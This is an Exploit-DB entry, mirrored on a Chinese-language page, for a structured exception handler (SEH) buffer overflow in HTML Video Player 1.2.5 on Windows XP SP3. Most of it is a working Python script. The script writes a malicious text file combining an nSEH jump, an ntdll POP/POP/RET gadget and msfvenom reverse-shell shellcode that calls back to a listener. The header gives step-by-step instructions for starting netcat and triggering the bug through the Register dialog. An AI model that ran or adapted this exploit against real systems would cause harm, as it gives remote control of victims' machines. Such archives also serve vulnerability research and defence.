HTML Video Player 1.2.5 – Buffer-Overflow (SEH)

  • 作者: Kağan Çapar
    日期: 2018-11-19
  • 类别:
    平台: Windows (tested on Windows XP SP3 ENG, see the header below)
  • 来源:https://www.exploit-db.com/exploits/45888/
  • # Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
    # Author: Kağan Çapar
    # Discovery Date: 2018-11-16
    # Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
    # Vendor Homepage : http://www.html5videoplayer.net
    # Tested Version: 1.2.5
    # Tested on OS: Windows XP SP3 *ENG
    # Steps to Reproduce: On the attacker host, start a listener on the LPORT
    # baked into the shellcode (1907 by default, e.g. "nc -lvp 1907") before
    # triggering the bug. Run the python exploit script; it creates a file named
    # "exploit.txt" (the script itself does not touch the clipboard). Open that
    # file and copy its whole contents, start the software, click Help > Register,
    # paste into "Username" and click "OK". The SEH overwrite then runs the
    # windows/shell_reverse_tcp payload, which connects back to your listener.
    
    #!/usr/bin/python
    import struct
    
    # Debugger SEH-chain dumps from two crashes taken while finding the offset:
    # first with an all-"A" buffer (handler overwritten with 41414141), then
    # presumably with a cyclic pattern (handler = 336F4332, i.e. the ASCII bytes
    # "2Co3" read little-endian), which yields the offset of the SEH record.
    #SEH chain of main thread, item 0
    #Address=0012EAF4
    #SE handler=41414141
    #=> next_handler below!
    #SEH chain of main thread, item 0
    #Address=0012EAF4
    #SE handler=336F4332 => 
    
    # POP ESI / POP EBX / RETN gadget used as the overwritten SE handler address.
    # It lives in ntdll.dll, which on Windows XP SP3 (no ASLR) loads at a fixed
    # base, so 0x7C901931 is tied to the exact ntdll build listed below
    # (5.1.2600.6055). On any other Windows build the gadget must be located
    # again, and SEH-overwrite techniques are generally blocked where
    # SafeSEH / SEHOP are enforced.
    #7C901931 5E POP ESI
    #7C901932 5B POP EBX
    #7C901933 C3 RETN
    
    #Executable modules, item 14
    #Base=7C900000
    #Size=000B2000 (729088.)
    #Entry=7C912AFC ntdll.<ModuleEntryPoint>
    #Name=ntdll(system)
    #File version=5.1.2600.6055 (xpsp_sp3_qfe.101
    #Path=C:\WINDOWS\system32\ntdll.dll
    
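    # ---------------------------------------------------------------------------
    # Payload layout written to exploit.txt (byte offsets into the file):
    #   [0, 1984)     filler: the 16-byte pattern repeated 124 times
    #   [1984, 1988)  nSEH  : EB 06 90 90 -> "jmp short +6": EIP sits at 1986 after
    #                 the jump, +6 lands on 1992, skipping the 4-byte SEH address
    #   [1988, 1992)  SEH   : 0x7C901931, ntdll.dll POP ESI / POP EBX / RETN
    #   [1992, 2343)  shellcode: 351 bytes, x86/shikata_ga_nai encoded
    #   [2343, 4000)  NOP sled padding up to TOTAL_LEN
    #
    # The payload is built as bytes and written in binary mode. The original
    # built a text str and opened the file with "w": under Python 3 that
    # re-encodes every byte >= 0x80 as two UTF-8 bytes, and on Windows text mode
    # translates line endings, either of which silently corrupts the payload.
    # ---------------------------------------------------------------------------
    OUTPUT_FILE = "exploit.txt"
    TOTAL_LEN = 4000

    # "CWDONKNPHRKEYAKS" -- same bytes as the original hex-escaped string.
    FILLER_PATTERN = b"\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53"
    FILLER_REPEAT = 124

    NSEH = b"\xEB\x06\x90\x90"  # jmp short +6, then two NOPs (never executed)
    POP_POP_RET = 0x7C901931     # ntdll.dll 5.1.2600.6055, XP SP3 only

    # Bytes the target mangles; the msfvenom command below excludes them, and
    # build_payload() refuses to emit a buffer containing any of them.
    BAD_CHARS = b"\x00\x0a\x0d\x1a"

    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
    #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
    #x86/shikata_ga_nai succeeded with size 351 (iteration=0)
    #x86/shikata_ga_nai chosen with final size 351
    #Payload size: 351 bytes
    #Final size of py file: 1684 bytes
    #
    # NOTE: LHOST 192.168.0.23 / LPORT 1907 are baked into these bytes; regenerate
    # the shellcode with the command above (keeping -b) for any other listener.
    SHELLCODE = (
        b"\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
        b"\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
        b"\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
        b"\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
        b"\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
        b"\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
        b"\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
        b"\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
        b"\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
        b"\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
        b"\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
        b"\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
        b"\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
        b"\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
        b"\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
        b"\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
        b"\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
        b"\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
        b"\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
        b"\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
        b"\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
        b"\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
        b"\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
        b"\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
        b"\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
        b"\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
        b"\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
    )


    def build_payload():
        """Assemble the SEH-overwrite buffer and return it as bytes.

        Returns:
            bytes of length TOTAL_LEN: filler, nSEH jump, SEH gadget address,
            shellcode, then NOP padding (nothing is appended if the body already
            reaches TOTAL_LEN, matching the original arithmetic).

        Raises:
            ValueError: if the assembled buffer contains one of BAD_CHARS, e.g.
                after the shellcode was regenerated without the -b option.
        """
        body = b"".join([
            FILLER_PATTERN * FILLER_REPEAT,
            NSEH,
            # Little-endian, as the handler pointer is laid out on the stack.
            struct.pack("<I", POP_POP_RET),
            SHELLCODE,
        ])
        payload = body.ljust(TOTAL_LEN, b"\x90")

        found = [c for c in BAD_CHARS if c in payload]
        if found:
            raise ValueError("payload contains bad chars: %r" % (found,))
        return payload


    def main():
        """Write the payload to OUTPUT_FILE and print its size, as before."""
        payload = build_payload()
        with open(OUTPUT_FILE, "wb") as fh:
            fh.write(payload)
        print(len(payload))


    if __name__ == "__main__":
        main()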